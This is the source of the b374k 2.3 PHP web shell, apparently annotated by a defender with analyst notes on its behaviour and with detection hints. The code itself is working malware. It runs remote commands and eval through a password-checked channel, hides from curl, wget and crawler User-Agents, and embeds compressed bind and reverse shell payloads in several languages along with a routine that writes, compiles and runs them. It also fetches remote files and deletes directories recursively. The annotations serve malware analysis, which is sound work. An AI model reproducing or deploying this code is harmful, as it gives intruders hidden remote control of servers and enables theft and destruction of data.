1<?php
2/*
3 b374k 2.3
4 Jayalah Indonesiaku
5 (c) 2013
6 http://code.google.com/p/b374k-shell
7
8*/
9
// Analyst note: the three calls below turn off PHP error reporting and on-page error
// display and lift the execution time limit, so failures later in the script are not
// surfaced to the visitor.
error_reporting(0);
@set_time_limit(0);
@ini_set('display_errors', '0');

$s_name = "b374k"; // shell name
$s_ver = "2.3"; // shell ver
$s_title = $s_name." ".$s_ver; // shell title
// Analyst note: access control is a single MD5 hex digest hard-coded in the file; the
// author's own comment states the default password. The digest literal and the string
// "b374k" are stable strings to search for when sweeping a web root for this sample.
$s_pass = "0de664ecd2be02cdd54234a0d1229b43"; // shell password, fill with password in md5 format to protect shell, default : b374k
$s_login_time = 3600 * 24 * 7; // cookie time (login)
19
20
// Analyst note: login state for the interactive UI.
//  - With an empty $s_pass every visitor is treated as authenticated (the final else).
//  - Otherwise a cookie named "b374k" is accepted when it equals the stored digest, i.e.
//    the cookie value is the MD5 hex string itself; a matching "login" request parameter
//    sets that cookie for $s_login_time seconds.
// Detection: requests carrying a "b374k" cookie with a 32-character hex value, or a
// "login" parameter answered with a Set-Cookie for that name, in web or proxy logs.
$s_auth = false; // login status
if(strlen(trim($s_pass))>0){
    if(isset($_COOKIE['b374k'])){
        // case-insensitive, loose (==) comparison of cookie value against the digest
        if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
    }
    if(isset($_REQUEST['login'])){
        $login = strtolower(md5(trim($_REQUEST['login'])));
        if(strtolower(trim($s_pass)) == $login){
            setcookie("b374k",$login,time() + $s_login_time);
            $s_auth = true;
        }
    }
}
else $s_auth = true;
35
36// This is a feature where you can control this script from another apps/scripts
37// you need to supply password (in md5 format) to access this
38// this example using password 'b374k' in md5 format (s_pass=0de664ecd2be02cdd54234a0d1229b43)
39// give the code/command you want to execute in base64 format
40// this example using command 'uname -a' in base64 format (cmd=dW5hbWUgLWE=)
41// example :
42// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&cmd=dW5hbWUgLWE=
43// next sample will evaluate php code 'phpinfo();' in base64 format (eval=cGhwaW5mbygpOw==)
44// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&eval=cGhwaW5mbygpOw==
45// recommended ways is using POST DATA
46// note that it will not works if shell password is empty ($s_pass);
47// better see code below
// Analyst note: scripted control channel, independent of the cookie login above.
// Any request with a non-empty "s_pass" parameter terminates in die() inside this block,
// whether or not the digest matches. On a match, "cmd" is base64-decoded and handed to
// exe(), or "eval" is base64-decoded and handed to eval(), and the captured output is
// echoed; with neither parameter the title string is returned.
// Detection: "s_pass" with a 32-hex value alongside base64 "cmd" or "eval" values.
// $_REQUEST is read, so the parameters may arrive in the query string or the request
// body; bodies are usually absent from access logs - TODO confirm what this host records.
if(!empty($_REQUEST['s_pass'])){
    if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){
        if(isset($_REQUEST['cmd'])){
            $cmd = base64_decode($_REQUEST['cmd']);
            echo exe($cmd);
        }
        elseif(isset($_REQUEST['eval'])){
            $code = base64_decode($_REQUEST['eval']);
            // output of the evaluated code is buffered, then echoed as the whole response
            ob_start();
            eval($code);
            $res = ob_get_contents();
            ob_end_clean();
            echo $res;
        }
        else echo $s_title;
    }
    die();
}
66
$mtime = explode(" ",microtime());
$s_start = (float)$mtime[0] + (float)$mtime[1]; // to calculate script execution time

// block search engine bot
// Analyst note: the pattern covers more than crawlers - it also matches User-Agent
// strings containing "curl", "wget", "python", "java", "lwp", "libwww" or "client".
// Those requests get a bare 404 and the script stops, so a scripted probe with a default
// User-Agent reports "not found" even though the file is present. Confirm presence from
// the file system (listing, hashes, integrity monitoring) rather than from HTTP status.
if(preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT'])){
    header("HTTP/1.0 404 Not Found");
    header("Status: 404 Not Found");
    die();
}
76
77// resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php this was used with bind and reverse shell
78// use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
79$rs_pl ="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";
80$rs_py = "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";
81$rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
82$rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
83$rs_win = "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";
84$rs_php = "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";
85$favicon = "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";
86$style = "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";
87// http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable
88$sortable_js = "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";
89
90// make link for folder $cwd and all of its parent folder
// Splits $p on DIRECTORY_SEPARATOR and returns one "?d=<prefix>" anchor per leading path
// component (the "- 1" bound skips the last element), concatenated and trimmed.
// Path text is written into the markup as-is.
function swd($p){
    $ps = explode(DIRECTORY_SEPARATOR,$p);
    $pu = "";
    for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
        // rebuild the path prefix up to and including component $i
        $pz = "";
        for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
        $pu .= "<a href=\"?d=".$pz."\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
    }
    return trim($pu);
}
101// remove <br />tags
// Returns $t with every literal "<br />" removed and surrounding whitespace trimmed.
function rp($t){
    return trim(str_replace("<br />","",$t));
}
105// replace spaces with underscore ( _ )
// Returns $t with each space replaced by "_"; showdir() uses the result to build
// HTML element ids from file and folder names.
function cs($t){
    return str_replace(" ","_",$t);
}
109// strip slashes,trim and urldecode
// Normalises a request value: urldecode() then trim(), with stripslashes() applied first
// when magic quotes are reported as enabled.
// Analyst note: get_magic_quotes_gpc() was removed in PHP 8.0, so this helper (and every
// request handler that calls it) is fatal on PHP 8+ - relevant when judging whether this
// sample could have been operated on a given host.
function ss($t){
    return (!get_magic_quotes_gpc())? trim(urldecode($t)) : trim(urldecode(stripslashes($t)));
}
113// only strip slashes
// Returns $t unchanged, or with stripslashes() applied when magic quotes are reported as
// enabled. Relies on get_magic_quotes_gpc(), which was removed in PHP 8.0.
function ssc($t){
    return (!get_magic_quotes_gpc())? $t : stripslashes($t);
}
117// bind and reverse shell
// Analyst note: dropper/launcher for the embedded bind and reverse shell payloads.
//   $rstype   "<method>_<lang>" per the author's list below; only the <lang> part selects
//             a branch here ($method is assigned but not read again in this function).
//   $rstarget appended to the launch command line as the payload's argument.
//   $rscode   base64 + deflate blob; decoded into $fc and written out or evaluated.
// Behaviour by language:
//   py / pl / rb  write b374k_rs.<lang> in the current directory, chmod +x, run it with
//                 python / perl / ruby.
//   c             write b374k_rs.c, compile with gcc to b374k_rs, chmod +x, run it.
//   win           write b374k_rs.exe and run it.
//   php           eval() the decoded code in-process; no file is written.
// The dropped files are unlinked before returning. Returns the last exe() output or one
// of the two error strings.
// Detection: short-lived files named b374k_rs, b374k_rs.c, b374k_rs.py, b374k_rs.pl,
// b374k_rs.rb or b374k_rs.exe in web-writable directories, and the web server / PHP
// worker spawning gcc, chmod, perl, python or ruby. Denying write access to the web
// root and keeping compilers off web hosts removes the file-based branches.
function rs($rstype,$rstarget,$rscode){
    //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
    //resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
    $result = "";
    $fc = gzinflate(base64_decode($rscode));

    $errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one";
    $errgcc = "Unable to compile using gcc";

    $split = explode("_",$rstype);
    $method = $split[0];
    $lang = $split[1];
    if($lang=="py" || $lang=="pl" || $lang=="rb"){
        if($lang=="py") $runlang = "python";
        elseif($lang=="pl") $runlang = "perl";
        elseif($lang=="rb") $runlang = "ruby";
        $fpath = "b374k_rs.".$lang;
        if(is_file($fpath)) unlink($fpath);
        if($file=fopen($fpath,"w")){
            fwrite($file,$fc);
            fclose($file);
            if(is_file($fpath)){
                $result = exe("chmod +x ".$fpath);
                $result = exe($runlang." ".$fpath." ".$rstarget);
            }
            else $result = $errperm;
        }
        else $result = $errperm;
    }
    elseif($lang=="c"){
        $fpath = "b374k_rs";
        if(is_file($fpath)) unlink($fpath);
        if(is_file($fpath.".c")) unlink($fpath.".c");
        if($file=fopen($fpath.".c","w")){
            fwrite($file,$fc);
            fclose($file);
            if(is_file($fpath.".c")){
                $result = exe("gcc ".$fpath.".c -o ".$fpath);
                if(is_file($fpath)){
                    $result = exe("chmod +x ".$fpath);
                    $result = exe("./".$fpath." ".$rstarget);
                }
                else $result = $errgcc;
            }
            else $result = $errperm;
        }
        else $result = $errperm;
    }
    elseif($lang=="win"){
        $fpath = "b374k_rs.exe";
        if(is_file($fpath)) unlink($fpath);
        if($file=fopen($fpath,"w")){
            fwrite($file,$fc);
            fclose($file);
            if(is_file($fpath)){
                $result = exe($fpath." ".$rstarget);
            }
            else $result = $errperm;
        }
        else $result = $errperm;
    }
    elseif($lang=="php"){
        eval("?>".$fc);
    }
    // cleanup of dropped files; in the php branch $fpath was never assigned
    if(is_file($fpath)) unlink($fpath);
    if(is_file($fpath.".c")) unlink($fpath.".c");
    return $result;
}
186// get file size
// Returns the size of file $f as a string with two decimals and a unit suffix
// (B .. YB, powers of 1024), the integer 0 for an empty file, or "???" when filesize()
// returns false.
function gs($f){
    $s = filesize($f);
    if($s !== false){
        if($s<=0) return 0;
        $w = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
        // $e is the unit index: floor of log base 1024 of the size
        $e = floor(log($s)/log(1024));
        return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
    }
    else return "???";
}
197// get file permissions
// Returns the nine-character rwx string (owner, group, other) built from the low nine
// bits of fileperms($f), or a string of question marks when fileperms() yields a falsy
// value.
function gp($f){
    if($m=fileperms($f)){
        $p='';
        // owner
        $p .= ($m & 00400) ? 'r' : '-';
        $p .= ($m & 00200) ? 'w' : '-';
        $p .= ($m & 00100) ? 'x' : '-';
        // group
        $p .= ($m & 00040) ? 'r' : '-';
        $p .= ($m & 00020) ? 'w' : '-';
        $p .= ($m & 00010) ? 'x' : '-';
        // other
        $p .= ($m & 00004) ? 'r' : '-';
        $p .= ($m & 00002) ? 'w' : '-';
        $p .= ($m & 00001) ? 'x' : '-';
        return $p;
    }
    else return "??????????";
}
214// shell command
// Analyst note: single choke point for operating-system command execution in this file.
// Appends " 2>&1" to $c, then tries, in order: system(), shell_exec(), exec(),
// passthru(), proc_open() and popen(). Each attempt is guarded by is_callable() and the
// first one that yields non-empty output is returned; "" is returned when none does.
// Hardening: a disable_functions list that omits any one of these six still leaves a
// working path (the is_callable() guards presumably skip disabled functions - verify for
// the PHP version in use). Process-creation telemetry showing the web server or PHP
// worker as parent of a shell is the more dependable signal.
function exe($c){
    $out = "";
    $c = $c." 2>&1";

    if(is_callable('system')) {
        // system() prints directly, so the output is captured through an output buffer
        ob_start();
        system($c);
        $out = ob_get_contents();
        ob_end_clean();
        if(!empty($out)) return $out;
    }
    if(is_callable('shell_exec')){
        $out = shell_exec($c);
        if(!empty($out)) return $out;
    }
    if(is_callable('exec')) {
        exec($c,$r);
        // output lines are concatenated without separators
        foreach($r as $s){
            $out .= $s;
        }
        if(!empty($out)) return $out;
    }
    if(is_callable('passthru')) {
        ob_start();
        passthru($c);
        $out = ob_get_contents();
        ob_end_clean();
        if(!empty($out)) return $out;
    }
    if(is_callable('proc_open')) {
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $proc = proc_open($c, $descriptorspec, $pipes, getcwd(), array());
        if (is_resource($proc)) {
            // stdout is drained first, then stderr
            while ($si = fgets($pipes[1])) {
                if(!empty($si)) $out .= $si;
            }
            while ($se = fgets($pipes[2])) {
                if(!empty($se)) $out .= $se;
            }
        }
        proc_close($proc);
        if(!empty($out)) return $out;
    }
    if(is_callable('popen')){
        $f = popen($c, 'r');
        if($f){
            while(!feof($f)){
                $out .= fread($f, 2096);
            }
            pclose($f);
        }
        if(!empty($out)) return $out;
    }
    return "";
}
274// add slash to the end of given path
// For an existing directory, strips all trailing DIRECTORY_SEPARATOR characters and
// returns the path with exactly one appended; any other value is returned unchanged.
function cp($p){
    if(is_dir($p)){
        $x = DIRECTORY_SEPARATOR;
        while(substr($p,-1) == $x) $p = rtrim($p,$x);
        return $p.$x;
    }
    return $p;
}
283// delete dir and all of its content (no warning !) xp
// Analyst note: recursive delete with no confirmation. Every entry matched by
// glob($d.'*', GLOB_MARK) is removed - directories by recursion, everything else by
// unlink() - and then $d itself is removed when it is a directory.
// Impact: during response, assume content under any path passed here is unrecoverable
// from the live file system and plan on backups.
function rmdirs($d) {
    $f = glob($d . '*', GLOB_MARK);
    foreach($f as $z){
        if(is_dir($z)) rmdirs($z);
        else unlink($z);
    }
    if(is_dir($d)) rmdir($d);
}
// Runs "which $pr" through exe() and returns the trimmed result, or the trimmed program
// name itself when the lookup produced no output.
function xwhich($pr){
    $p = exe("which $pr");
    if(trim($p)!="") { return trim($p); } else { return trim($pr); }
}
296// download file from internet
// Analyst note: fetches URL $u and stores it at path $p; returns true once $p exists as
// a file, false otherwise. Order of attempts: file_get_contents() in PHP, then wget,
// lwp-download, lynx -source and curl, each launched through exe() with $u and $p
// concatenated into the command line.
// Detection: outbound HTTP(S) connections initiated by the web server or PHP worker, and
// that process spawning wget, lwp-download, lynx or curl. Egress filtering for web hosts
// limits this path.
function dlfile($u,$p){
    $n = basename($u);

    // try using php functions
    if($t = file_get_contents($u)){
        if(is_file($p)) unlink($p);;
        if($f=fopen($p,"w")){
            fwrite($f,$t);
            fclose($f);
            if(is_file($p)) return true;
        }
    }
    // using wget
    exe(xwhich('wget')." ".$u." -O ".$p);
    if(is_file($p)) return true;

    // try using lwp-download
    exe(xwhich('lwp-download')." ".$u." ".$p);
    if(is_file($p)) return true;

    // try using lynx
    exe(xwhich('lynx')." -source ".$u." > ".$p);
    if(is_file($p)) return true;

    // try using curl
    exe(xwhich('curl')." ".$u." -o ".$p);
    if(is_file($p)) return true;

    return false;
}
327// find writable dir
// Picks a directory for temporary files: "./" when the current directory is writable,
// otherwise the first non-empty of the TMP, TEMP and TMPDIR environment variables,
// otherwise "/tmp/" when writable, otherwise the current working directory.
// Analyst note: these are the locations to check for leftover archives and scratch
// files written by the download and code-evaluation handlers.
function get_writabledir(){
    if(is_writable(".")) $d = ".".DIRECTORY_SEPARATOR;
    else{
        if(!$d = getenv("TMP")) if(!$d = getenv("TEMP")) if(!$d = getenv("TMPDIR")){
            if(is_writable("/tmp")) $d = "/tmp/";
            else $d = getcwd().DIRECTORY_SEPARATOR;
        }
    }
    return $d;
}
338// zip function
// Archives $src (a file or a directory tree) into the zip file $dest using ZipArchive.
// Returns false when the zip extension is missing, $src does not exist or the archive
// cannot be opened, and true after the archive is closed. When the extension is loaded
// but the ZipArchive class is absent the function falls off the end without a return
// value.
// Analyst note: this is the bulk-collection path behind the "ziparchive" download type;
// unexpected .zip files in the web root or temp directories are worth correlating with
// large responses from the same script.
function zip($src, $dest){
    if(!extension_loaded('zip') || !file_exists($src)) return false;

    if(class_exists("ZipArchive")){
        $zip = new ZipArchive();
        // flag value 1 is presumably ZipArchive::CREATE - confirm against the PHP manual
        if(!$zip->open($dest, 1)) return false;

        $src = str_replace('\\', '/', $src);
        if(is_dir($src)){
            // mode 1 is presumably RecursiveIteratorIterator::SELF_FIRST - confirm
            $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src), 1);
            foreach($files as $file){
                $file = str_replace('\\', '/', $file);
                // skip the "." and ".." entries
                if(in_array(substr($file, strrpos($file, '/')+1), array('.', '..'))) continue;
                if (is_dir($file) === true) $zip->addEmptyDir(str_replace($src . '/', '', $file . '/'));
                else if (is_file($file) === true) $zip->addFromString(str_replace($src . '/', '', $file), file_get_contents($file));
            }
        }
        elseif(is_file($src) === true) $zip->addFromString(basename($src), file_get_contents($src));
        $zip->close();
        return true;
    }
}
361// check shell permission to access program
// Reports whether a tool can be run from the web process: executes the tool's help
// command through exe() and returns true when the lower-cased output contains "usage".
// Recognised $lang values: python, perl, ruby, gcc, tar, java (java requires both javac
// and java to answer). Any other value returns false.
// Detection: the web server or PHP worker running "python -h", "perl -h", "ruby -h",
// "gcc --help", "tar --help", "javac --help" or "java -h", typically several in a row.
function check_access($lang){
    switch($lang){
        case "python":
            $cek = strtolower(exe("python -h"));
            if(strpos($cek,"usage")!==false) return true;
            break;
        case "perl":
            $cek = strtolower(exe("perl -h"));
            if(strpos($cek,"usage")!==false) return true;
            break;
        case "ruby":
            $cek = strtolower(exe("ruby -h"));
            if(strpos($cek,"usage")!==false) return true;
            break;
        case "gcc":
            $cek = strtolower(exe("gcc --help"));
            if(strpos($cek,"usage")!==false) return true;
            break;
        case "tar":
            $cek = strtolower(exe("tar --help"));
            if(strpos($cek,"usage")!==false) return true;
            break;
        case "java":
            $cek = strtolower(exe("javac --help"));
            if(strpos($cek,"usage")!==false){
                $cek = strtolower(exe("java -h"));
                if(strpos($cek,"usage")!==false) return true;
            }
            break;
    }
    return false;
}
394// find available archiver
// Builds the HTML for the per-entry download form. The option list always contains
// "raw", adds "ziparchive" when the ZipArchive class exists and "tar" / "targz" when
// check_access("tar") succeeds. The literal tokens __dlpath__ and __dlcwd__ are left in
// the markup for the caller to substitute.
// Analyst note: the form posts the fields "dltype", "dlpath" and "d" to the script's
// own path; those names are what to look for in captured request bodies.
function get_archiver_available(){
    $dlfile = "";
    $avail_arc = array("raw"=>"raw");

    if(class_exists("ZipArchive")){
        $avail_arc["ziparchive"] = "zip";
    }
    if(check_access("tar")){
        $avail_arc["tar"] = "tar";
        $avail_arc["targz"] = "tar.gz";
    }

    $option_arc = "";
    foreach($avail_arc as $t=>$u){
        $option_arc .= "<option value=\"".$t."\">".$u."</option>";
    }

    $dlfile .= "<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
 <select onchange=\"download(this);\" name=\"dltype\" class=\"inputzbut\" style=\"width:80px;height:20px;\">
 <option value=\"\" disabled selected>Download</option>
 ".$option_arc."
 </select>
 <input type=\"hidden\" name=\"dlpath\" value=\"__dlpath__\" />
 <input type=\"hidden\" name=\"d\" value=\"__dlcwd__\" />
 </form>
 ";
    return $dlfile;
}
423// explorer, return a table of given dir
// Renders the file-manager view for directory $cwd and returns it as one HTML table.
// Entries come from scandir() (or opendir()/readdir() as fallback), are split into
// directories and files, sorted, and emitted one row each with size, optional
// owner : group (only off Windows with the posix functions present), permissions,
// modification time, action links and the download form from get_archiver_available().
// Note that is_dir()/is_file() are applied to the bare entry name, so classification
// depends on the process working directory matching $cwd.
// Analyst note: the rows define the request vocabulary of the file manager. Links use
// the query parameters "d", "view", "edit", "delete", "rmdir" and "upload"; the inline
// forms send "oldname", "newname", "rename", "mkdir" and "d". These names, combined
// with absolute server paths as values, are practical search terms for access logs.
function showdir($cwd){
    $posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
    $win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false;

    $fname = array();
    $dname = array();

    if(function_exists("scandir") && $dh = @scandir($cwd)){
        foreach($dh as $file){
            if(is_dir($file)) $dname[] = $file;
            elseif(is_file($file)) $fname[] = $file;
        }
    }
    else{
        if($dh = @opendir($cwd)){
            while($file = readdir($dh)){
                if(is_dir($file)) $dname[] = $file;
                elseif(is_file($file))$fname[] = $file;
            }
            closedir($dh);
        }
    }

    sort($fname);
    sort($dname);

    $path = explode(DIRECTORY_SEPARATOR,$cwd);
    $tree = sizeof($path);
    $parent = "";
    $owner_html = (!$win && $posix) ? "<th style=\"width:120px;\">owner : group</th>" : "";
    $buff = "
 <table class=\"explore sortable\">
 <tr><th>name</th><th style=\"width:60px;\">size</th>".$owner_html."<th style=\"width:70px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:180px;\">action</th><th style=\"width:90px;\">download</th></tr>
 ";
    // parent directory = $cwd without its last component (the path ends with a separator)
    if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
    else $parent = $cwd;

    $dlfile = get_archiver_available();

    // directory rows: ".", ".." and ordinary folders each get their own template
    foreach($dname as $folder){
        if(!$win && $posix){
            $name = posix_getpwuid(fileowner($folder));
            $group = posix_getgrgid(filegroup($folder));
            $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
            $owner_html = "<td style=\"text-align:center;\">".$owner."</td>";
        }
        // folders cannot be downloaded "raw", so that option is dropped from the form
        $dlfile_ = str_replace("<option value=\"raw\">raw</option>", "", $dlfile);
        $dlfile_ = str_replace("__dlpath__",$folder,$dlfile_);
        $dlfile_ = str_replace("__dlcwd__",$cwd,$dlfile_);
        if($folder == ".") {
            $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd)."');\"><a href=\"?d=".$cwd."\">[ $folder ]</a></td><td>LINK</td>".$owner_html."<td style=\"text-align:center;\">".gp($cwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($cwd))."</td><td><span id=\"titik1\"><a href=\"?upload&d=$cwd\">upload</a> | <a href=\"?d=$cwd&edit=".$cwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
 <input class=\"inputz\" id=\"titik1_\" style=\"width:110px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
 </form></td><td>".$dlfile_."</td></tr>
 ";
        }
        elseif($folder == "..") {
            $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($parent)."');\"><a href=\"?d=".$parent."\">[ $folder ]</a></td><td>LINK</td>".$owner_html."<td style=\"text-align:center;\">".gp($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?upload&d=$parent\">upload</a> | <a href=\"?d=$cwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
 <input class=\"inputz\" id=\"titik2_\" style=\"width:110px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
 </form>
 </td><td>".$dlfile_."</td></tr>";
        }
        else {
            $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd.$folder.DIRECTORY_SEPARATOR)."');\"><a id=\"".cs($folder)."_link\" href=\"?d=".$cwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
 <form onclick=\"cancelBubble(event);\" action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
 <input class=\"inputz\" style=\"width:200px;\" id=\"".cs($folder)."_link_\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($folder)."_form','".cs($folder)."_link');\" />
 </form>
 <td>DIR</td>".$owner_html."<td style=\"text-align:center;\">".gp($cwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a href=\"?upload&d=".$cwd.$folder."\">upload</a> | <a href=\"javascript:tukar('".cs($folder)."_link','".cs($folder)."_form');\">rename</a> | <a href=\"?d=".$cwd."&rmdir=".$cwd.$folder."\">delete</a></td><td>".$dlfile_."</td></tr>";
        }
    }

    // file rows: view / edit / rename / delete links plus the full download form
    foreach($fname as $file){
        $full = $cwd.$file;
        if(!$win && $posix){
            $name = posix_getpwuid(fileowner($full));
            $group = posix_getgrgid(filegroup($full));
            $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
            $owner_html = "<td style=\"text-align:center;\">".$owner."</td>";
        }
        $dlfile_ = str_replace("__dlpath__",$file,$dlfile);
        $dlfile_ = str_replace("__dlcwd__",$cwd,$dlfile_);
        $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd)."&view=".addslashes($full)."');\"><a id=\"".cs($file)."_link\" href=\"?d=$cwd&view=$full\">$file</a>
 <form onclick=\"cancelBubble(event);\" action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"".cs($file)."_link_\" name=\"newname\" value=\"".$file."\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($file)."_link','".cs($file)."_form');\" />
 </form>
 </td><td title=\"".filesize($full)."\">".gs($full)."</td>".$owner_html."<td style=\"text-align:center;\">".gp($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($full))."</td>
 <td><a href=\"?d=$cwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".cs($file)."_link','".cs($file)."_form');\">rename</a> | <a href=\"?d=$cwd&delete=$full\">delete</a></td><td>".$dlfile_."</td></tr>";
    }
    $buff .= "</table>";
    return $buff;
}
528
529// favicon
// Analyst note: static-asset handlers for the UI. Both run before the $s_auth check that
// follows, so they answer without a login (the User-Agent filter earlier in the file
// still applies). Each inflates an embedded base64 + deflate blob, sets the content type
